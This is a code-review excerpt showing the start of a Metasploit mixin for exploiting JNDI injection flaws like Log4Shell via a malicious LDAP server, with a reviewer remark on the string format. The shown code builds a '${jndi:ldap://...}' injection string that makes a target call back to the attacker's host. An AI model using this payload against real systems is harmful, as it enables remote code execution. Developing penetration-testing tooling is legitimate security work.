lib/msf/core/exploit/remote/jndi_injection.rb

```diff
@@ -0,0 +1,136 @@
+# -*- coding: binary -*-
+
+#
+# This is a mixin containing methods to facilitate exploiting JNDI injection flaws (such as Log4Shell) by using a
+# malicious LDAP server.
+#
+# See:
+#   https://www.veracode.com/blog/research/exploiting-jndi-injections-java
+#   https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/
+#
+
+module Msf
+module Exploit::Remote::JndiInjection
+  include Msf::Exploit::Java
+  include Msf::Exploit::JavaDeserialization
+  include Msf::Exploit::Remote::LDAP::Server
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Stance' => Msf::Exploit::Stance::Aggressive))
+
+    register_advanced_options([
+      OptBool.new('LDAP_AUTH_BYPASS', [true, 'Ignore LDAP client authentication', true])
+    ])
+  end
+
+  # Create the JNDI injection string that will trigger an LDAP connection back to Metasploit.
+  #
+  # @return [String] the JNDI string
+  def jndi_string
+    "${jndi:ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}}"
```

Comment:
Technically, the JNDI string does not contain the `${jndi:` prefix and `}` suffix. Those are specific to Log4J.